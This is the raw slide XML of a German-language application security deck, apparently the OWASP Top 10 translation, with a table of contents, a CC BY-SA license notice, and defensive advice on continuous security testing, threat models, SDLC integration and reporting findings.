                        </a:rPr>
                        <a:t>22</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1"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+RF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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Details zu den Risiko-Faktoren	……..……..</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="95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34" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>23</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1"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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Methodik und Daten	………………………...</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="95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35" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>24</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+DS</a:t>
                      </a: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Danksagung	…….…………………..……….</a:t>
                      </a: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36" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>25</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endParaRPr lang="de-DE"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605911438"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8506800"/>
          <a:ext cx="6854400" cy="1401083"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="336757">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Copyright und </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" err="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Lizenz</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt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10636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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Copyright © 2003 – 2018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de-DE" sz="1000" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dieses Dokument ist unter der Creative </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Commons</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Attribution Share-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Alike</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 4.0 Lizenz veröffentlicht. Bei Weiterverwendung oder Weitergabe muss die Lizenz erhalten bleiben</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1371600" marT="49530" marB="4953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9" name="Picture 2" descr="by-sa.png">
            <a:hlinkClick r:id="rId37"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152401" y="9090000"/>
            <a:ext cx="968784" cy="367200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2149622038"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6854400" cy="8966400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="343559">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Dauerhafte Tests der Anwendungssicherheit </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>etablieren</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1100" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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841">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Die Erstellung von sicherem Code ist sehr wichtig. Noch wichtiger jedoch ist die Überprüfung, dass die Sicherheit, die in die Anwendung implementiert werden sollte, auch tatsächlich vorhanden sowie korrekt implementiert ist und an allen vorgesehenen Stellen eingesetzt wird. Das Ziel eines Anwendungssicherheitstest ist es, dies zu belegen. Diese Arbeit ist schwierig und komplex, zusätzlich üben moderne Entwicklungsprozesse, wie agile Entwicklung oder </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DevOps</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 einen erheblichen Druck auf traditionelle Vorgehensweisen und Tools aus. Daher empfehlen wir eindringlich, sich ausgiebig Gedanken darüber zu machen, wie man sich auf das Wesentliche und Wichtige innerhalb seines kompletten Anwendungsportfolios konzentrieren und das Testen kosteneffizient durchführen kann.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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Die aktuelle Risikolandschaft verändert sich schnell, sodass die Zeiten von einmal jährlich durchgeführten Scans oder Penetrationstests längst vorbei sind. Moderne Softwareentwicklung erfordert </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" u="sng" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>kontinuierliche</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 Anwendungssicherheitstests über den gesamten Softwareentwicklungsprozess. Hierbei sollte im Auge behalten werden, wie existierende Entwicklungspipelines mit automatischen Sicherheitstests verbessert werden können, ohne die Entwicklung zu verlangsamen. Unabhängig von dem gewählten Ansatz müssen jährliche Kosten für Testen, Priorisieren (Triage), Korrigieren, erneutes Testen sowie erneutes Ausliefern einer einzelnen Anwendung multipliziert mit der Größe des Anwendungsportfolios berücksichtig werden.</a:t>
                      </a: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platzhalter 10"/>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+T</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Nächste Schritte für Sicherheitstester</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-876300" y="3152800"/>
            <a:ext cx="8670785" cy="5448300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="219293" y="3692858"/>
            <a:ext cx="6479598" cy="5317937"/>
            <a:chOff x="219293" y="3150429"/>
            <a:chExt cx="6479598" cy="4908868"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="3206921"/>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de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Bevor Sie mit dem Testen beginnen, vergewissern Sie sich, dass Sie wissen, wofür Sie Zeit benötigen. Prioritäten ergeben sich aus dem Bedrohungsmodell. Falls noch kein Modell vorliegt, müssen Sie vor dem Testen ein solches erstellen. Erwägen Sie die Verwendung von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ASVS</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5"/>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oder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des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6"/>
                </a:rPr>
                <a:t>OWASP Testing Guides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und verlassen Sie sich nicht auf Tool-Anbieter, um zu entscheiden, was für Ihr Unternehmen wichtig ist.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle: Rounded Corners 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="3150429"/>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1050" kern="120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49588" y="4227680"/>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de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Ihr Ansatz für die Sicherheitsprüfung von Anwendungen muss mit den Personen, Prozessen und Tools, die Sie in Ihrem Software Development Lifecycle (SDLC) verwenden, in hohem Maße kompatibel sein. Versuche, zusätzliche Schritte, Gatter und Überprüfungen zu erzwingen, verursachen wahrscheinlich Spannungen, werden umgangen und sind schlecht skalierbar. Achten Sie auf natürliche Möglichkeiten, Sicherheitsinformationen zu sammeln und in Ihren Prozess einfließen zu lassen.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="4171188"/>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49588" y="5247974"/>
              <a:ext cx="5549303" cy="72775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de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Wählen Sie zur Verifikation jeder einzelnen Anforderung die einfachste, schnellste und genaueste Technik. Das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7"/>
                </a:rPr>
                <a:t>OWASP Security Knowledge Framework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und der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Application Security Verification Standard</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können eine gute Quelle für funktionale und nicht-funktionale Anforderungen für Ihre Unit- und Integrationstests sein. Stellen Sie sicher, dass Sie die erforderlichen Personal-ressourcen für den Umgang mit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False</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-Positives aus der Verwendung automatisierter Werkzeuge sowie die ernsten Gefahren von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False</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-Negatives berücksichtigen.</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3" name="Rectangle: Rounded Corners 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="5196300"/>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1050" b="1">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49588" y="6261855"/>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de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Es ist nicht erforderlich, zu Beginn alles zu testen. Fokussieren Sie sich auf das Wichtigste und erweitern Sie mit der Zeit Ihren Prüfungsplan. Dies beinhaltet sowohl das Erweitern der Sammlung von Sicherheitsmaßnahmen und Risiken, die automatisch verifiziert werden, als auch die Erweiterung der abgedeckten Anwendungen und APIs. Das Ziel ist es einen Status zu erreichen, in dem die essentielle Sicherheit aller Applikationen und APIs kontinuierlich verifiziert wird.</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5" name="Rectangle: Rounded Corners 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="225522" y="6205362"/>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36000" tIns="64946" rIns="36000" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Abdeckung</a:t>
              </a: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 und </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Genauigkeit</a:t>
              </a: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dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>erreichen</a:t>
              </a:r>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49588" y="7198620"/>
              <a:ext cx="5549303" cy="860677"/>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de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Egal wie gut Sie im Testen sind, es macht keinen Unterschied bis Sie es effizient kommunizieren. Bauen Sie Vertrauen auf, indem Sie zeigen, dass Sie verstehen wie die Anwendung funktioniert. Beschreiben Sie klar und ohne Fachsprache, wie man das Gefundene ausnutzen kann und fügen Sie ein Angriffsszenario bei, um die möglichen Angriffe realitätsnah darzustellen. Machen Sie eine realistische Einschätzung, wie schwer es ist, die Schwachstelle zu finden sowie auszunutzen und wie schwerwiegend das wäre. Stellen Sie die Ergebnisse in den Tools bereit, die die Entwicklerteams benutzen, nicht als PDF-Dateien.</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7" name="Rectangle: Rounded Corners 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="7214424"/>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2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA493BA7-5997-4A18-9618-62319A0A692F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214008" y="3809291"/>
            <a:ext cx="935580" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Das </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" err="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Angreifer-modell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> verstehen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA98B84-34A6-4B60-9C0A-BF59F260AF1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198165" y="4889411"/>
            <a:ext cx="935580" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Den </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" err="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eigenen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SDLC verstehen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4155ED7B-C46B-4C58-9799-5E20D5780F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116996" y="8197211"/>
            <a:ext cx="1151765" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Ergebnisse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>klar</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>kommuni-zieren</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CF33244-EE9F-4F43-BB97-6B1402555620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116996" y="6136333"/>
            <a:ext cx="1151765" cy="383182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="44450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Test-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Strategien</a:t>
            </a:r>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
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
